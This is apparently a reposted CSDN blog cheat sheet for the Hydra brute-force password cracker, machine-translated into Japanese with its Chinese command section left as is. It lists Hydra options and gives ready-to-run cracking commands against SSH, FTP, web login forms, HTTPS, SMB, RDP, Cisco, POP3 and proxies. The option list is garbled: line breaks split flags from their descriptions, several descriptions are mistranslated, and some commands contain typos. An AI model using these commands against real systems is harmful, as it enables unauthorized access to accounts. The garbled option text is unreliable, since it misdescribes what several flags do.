ヒドラ(ヒドラ)ブルートフォースクラッキング

ブルートフォースクラッキング:
hydra(Hydra)
パラメーター:
-Rは前の進行状況からクラッキングを継続し
ます-S大文字、SSLリンクを使用
-s小文字、このパラメーターを使用してデフォルト以外のポートを
指定できます-lクラッキングされたユーザーを指定します特定のユーザー
-Lは、ユーザー名辞書
-pを小文字で指定し、パスワードクラッキングを指定し、使用量を減らします。通常はパスワード辞書
-P大文字を使用し、パスワード辞書を指定します
-e選択可能なオプション、n:空白のパスワードの誘惑、s:指定されたユーザーとパスワードの誘惑
-C-L / -Pパラメーターの代わりに「ログイン名:パスワード」などのコロン区切り形式を使用します
-Mはターゲットリストファイルを1行に1
指定します-oは結果出力ファイルを指定します
-f後-Mパラメーターを使用して、ログイン名の最初のペアを見つけるか、パスワードの解読を停止します
-t同時に実行されているスレッドの数、デフォルトは16-
w最大タイムアウト時間を秒単位で設定します。デフォルトは30秒です
- v / -V詳細なプロセスを表示します

各プロトコルの特定のコマンド:
フォーマット+例:

1、破解ssh:
hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp:
hydra ip ftp -L 用户名字典 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、get方式提交,破解web登录:
hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get/admin/index.PHP

4、post方式提交,破解web登录:
hydra --L 用户名字典 -P 密码字典 -s 80 ip http-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form"login.php:id=^USER^&passwd=^PASS^:<title>wrong username orpassword</title>"
参数说明:
-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止,
10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示

5、破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6、破解teamspeak:
hydra -L 用户名字典 -P 密码字典 -s 端口号 -vV ip teamspeak

7、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8、破解smb:
hydra -L 用户名字典 -P pass.txt 10.36.16.18 smb

9、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18

おすすめ

転載: blog.csdn.net/weixin_42478365/article/details/113699665